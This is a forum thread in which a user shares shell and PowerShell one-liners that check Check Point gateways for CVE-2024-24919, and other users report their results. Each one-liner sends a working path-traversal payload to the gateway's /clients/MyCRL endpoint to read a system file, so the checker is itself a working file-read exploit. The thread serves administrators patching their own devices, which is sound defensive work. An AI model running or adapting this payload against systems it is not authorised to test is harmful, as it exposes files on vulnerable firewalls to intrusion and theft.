ONELINER - Check CVE-2024-24919 Vulnerability

HeikoAnkenbrand

Run this onliner to check if your Check Point Gateway is vulnerable to CVE-2024-24919 (sk182336).
GAIA gateways and SMB gateways are supported.

1) Depending on where you want to run the Onliner, you can copy and paste the code for GAIA, Linux or Powershell.
Copy the code into the CLI.

1a) GAIA version for expert mode:

clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl_cli --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"

1b) Linux version (all other linux distributions):

clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"

1c) Windows Powershell version:

clear;$C="";$O="";[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};Add-Type -AssemblyName Microsoft.VisualBasic;$IP_addr = [Microsoft.VisualBasic.Interaction]::InputBox("This is a test tool to check if your Check Point Gateway is vulnerable to CVE-2024-24919.`r`n`r`n`r`nDestination IP:", "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", "");try{$C=(Invoke-WebRequest -Uri "https://${ip_addr}/clients/MyCRL" -Method POST -Body "aCSHELL/../../../../../../../etc/cp-release" -TimeoutSec 5 )} catch [System.Net.WebException] { if([int]$_.Exception.Response.StatusCode -eq 404) {$O="`r`nNo vulnerability could be detected!`r`n" } else {$O="`r`nGateway is not reachable!`r`n"} };  if ($C.StatusCode -match "200") {$O="`r`nNo vulnerability could be detected!`r`n"; if ($C.content -match "Check Point")  {$O="`r`nAttention! `r`nThis system is vulnerable to CVE-2024-24919. More read here sk182336.`r`n"}};Add-Type -AssemblyName System.Windows.Forms; $result = [System.Windows.Forms.MessageBox]::Show($O, "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::None)

2) Now enter the IP address of the gateway to be checked.

GAIA/Linux:

Powershell:

If the following message appears, your system is vulnerable:

Attention!
The system is vulnerable to CVE-2024-24919.
More read here sk182336.

If the following message appears, your system is not vulnerable:

No vulnerability could be detected!

If no output appears, the system is not be reachable.

---

Version:
1.5          06/02/2024                                                     Powershell interactive version with windows
1.4          06/01/2024                                                     Powershell version with correct status codes
1.3          06/01/2024                                                     Linux and Powershell version provided
1.2          05/30/2024                                                     error with SMB applications fixed
1.1          05/29/2024                                                     fixed error with output
1.0          05/28/2024       first version

➜ CCSM Elite, CCME, CCTE

natascha

Very helpful tool.
We have checked about 40 gateways and found a few without a hotfix in our company.

Thanks @HeikoAnkenbrand

renzi

Nice

the_rock

Fantastic as always!

dceko

Hi,

Can you modify script to check only for HTTP Response code after "| sed", because i think every gateway that respond with response code that is not 404 - File Not Found is vulnerable? This way this check can be used for small boxes, not managed by management server.

HeikoAnkenbrand

I have adapted the code so that it should now also work with SMB applications.

➜ CCSM Elite, CCME, CCTE

HeikoAnkenbrand

Here you can read the latest information from Check Point:

- Preventative Hotfix for CVE-2024-24919 - Quantum Gateway Information Disclosure

- Important security update - stay protected against VPN Information Disclosure (CVE-2024-24919)

➜ CCSM Elite, CCME, CCTE

the_rock

I just ran it on my Azure fw and it did not display anything...weird, though I do have vpn enabled, as well as remote access too. I may need to read up on all this again, as I came back from vacation, so its possible this is not even related to original issue with local vpn users/remote access. Never mind, read it afterwards, it is related, but will look into it more Monday.

Andy

CVE-2024-24919 check tool by Heiko Ankenbrand 2024

Destination IP: 52.229.98.249
[Expert@azurefw:0]#

Moudar

When running it on my gateway expert mode i get this:

Destination IP: 10.10.11.11
<!DOCTYPE html><HTML><HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE9,EmulateIE8"><meta name="others" content="WEBUI LOGIN PAGE"  /><TITLE>GAiA</TITLE>
<link rel="shortcut icon" href="/login/fav.ico">
<link rel="stylesheet" type="text/css" href="/login/ext-all.css" />
<link rel="stylesheet" type="text/css" href="/login/login.css" />
<STYLE TYPE="text/css">
.ext-ie .webui-login-fld{font-size: 11px;}
</STYLE>
<script type="text/javascript" src="/login/ext-base.js"></script><script type="text/javascript" src="/login/ext-all.js"></script><script type="text/javascript">var errMsgText = "";var bannerMsgText = "";bannerMsgText += "This%20system%20is%20for%20authorized%20use%20only.%0A";var hostname='fw01';var version='R81.20';var formAction="/cgi-bin/home.tcl";</script><script type="text/javascript" src="/login/login.js"></script></HEAD><BODY><noscript><div style='font-size:20px;position:relative;top:100px;'>For full functionality of this site it is necessary to enable JavaScript.</div></noscript></BODY></HTML>

the_rock

R81.20?

HeikoAnkenbrand

Hi @Moudar

This is the HTML code of the gateway login screen.
I have modified the onliner so that this will no longer be shown in the future.

➜ CCSM Elite, CCME, CCTE

genisis__

Is there a oneliner we can run on the gateway itself and how does this work in VSX?

HeikoAnkenbrand

I think that should work in VS0.

➜ CCSM Elite, CCME, CCTE

genisis__

thanks Heiko

HeikoAnkenbrand

Version 1.5 works as an interactive version with windows:

➜ CCSM Elite, CCME, CCTE

the_rock

AWESOME!

EitschStwoN

Hi Heiko,

Thanks for this script, it is really a shame that Checkpoint did not provide this themselves or at least refer to this article in the mitigation guide.

Looks like the problem has been around for a long time and its strange that this has never been seen in a CODE review.
Usually you trust a firewall not to have such rookie bugs.

Markus

GHOST

👍

HeikoAnkenbrand

@EitschStwoN

I think they don't want to publish the exploit code in the forum.
And from my point of view, that's a good thing.

➜ CCSM Elite, CCME, CCTE

the_rock

Totally agree.

Are you a member of CheckMates?

ONELINER - Check CVE-2024-24919 Vulnerability